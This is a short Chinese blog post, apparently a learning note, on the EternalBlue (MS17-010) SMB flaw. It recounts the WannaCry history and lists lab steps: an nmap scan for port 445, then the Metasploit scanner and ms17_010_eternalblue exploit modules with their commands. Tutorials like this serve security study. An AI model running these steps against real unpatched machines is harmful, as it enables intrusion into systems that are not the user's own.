Hi，大家好，我是编程小6，很荣幸遇见你，我把这些年在开发过程中遇到的问题或想法写出来，今天说一说永恒之蓝（MS17-010）,希望能够帮助你!!!。

温馨提醒：纯水文，如果不幸翻到这篇文章，可以立刻关闭！

先整理两个学习的链接（本文学习第一个）：
永恒之蓝（MS17-010）
永恒之蓝（MS17-010）

追溯了解（百度）

永恒之蓝是指2017年4月14日晚，黑客团体Shadow Brokers（影子经纪人）公布一大批网络攻击工具，其中包含“永恒之蓝”工具，“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日，不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招，被勒索支付高额赎金才能解密恢复文件。
基于Windows网络共享协议进行攻击传播的蠕虫恶意代码

网络IP查找

ipconfig/all或者ipconfig

环境条件

两台主机能够互通通信，且靶机未打补丁以及开启445端口，关闭防火墙。虚拟机网络连接为桥接模式；

复现流程

没找到合适的主机，只能了解一下流程！（虚拟机下个win7就行，我当时傻…）

445端口

1. 通过攻击机Kail的nmap进行端口扫描，通过扫描能够发现靶机的，445端口是否开启。命令为：nmap+靶机IP

使用MSF的永恒之蓝漏洞模块

1.打开MSF，命令为：msfconsole

2.搜索 ms17-010 代码（查找对应攻击模块），命令为：search ms17_010

0 exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。
3 auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块。
一般先通过扫描模块对目标主机进行扫描判断是否存在漏洞，若存在漏洞再通过攻击模块进行攻击。

扫描模块

1.使用扫描模块对靶机进行扫描：命令为：use auxiliary/scanner/smb/smb_ms17_010
2.查看配置参数：命令为：set rhosts 192.168.20.10
3.执行扫描：命令为：run
通过扫描能够发现靶机可能会受到MS17-010的攻击。

攻击模块

1.使用攻击模块对靶机进行攻击：
命令为：use exploit/windows/smb/ms17_010_eternalblue
2.可以查看攻击模块能够攻击那些操作系统：
命令为：show targets
3.设置靶机或者目标IP：
命令为：set rhosts +靶机IP
执行攻击：命令为：exploit 或 run

今天的分享到此就结束了，感谢您的阅读，如果确实帮到您，您可以动动手指转发给其他人。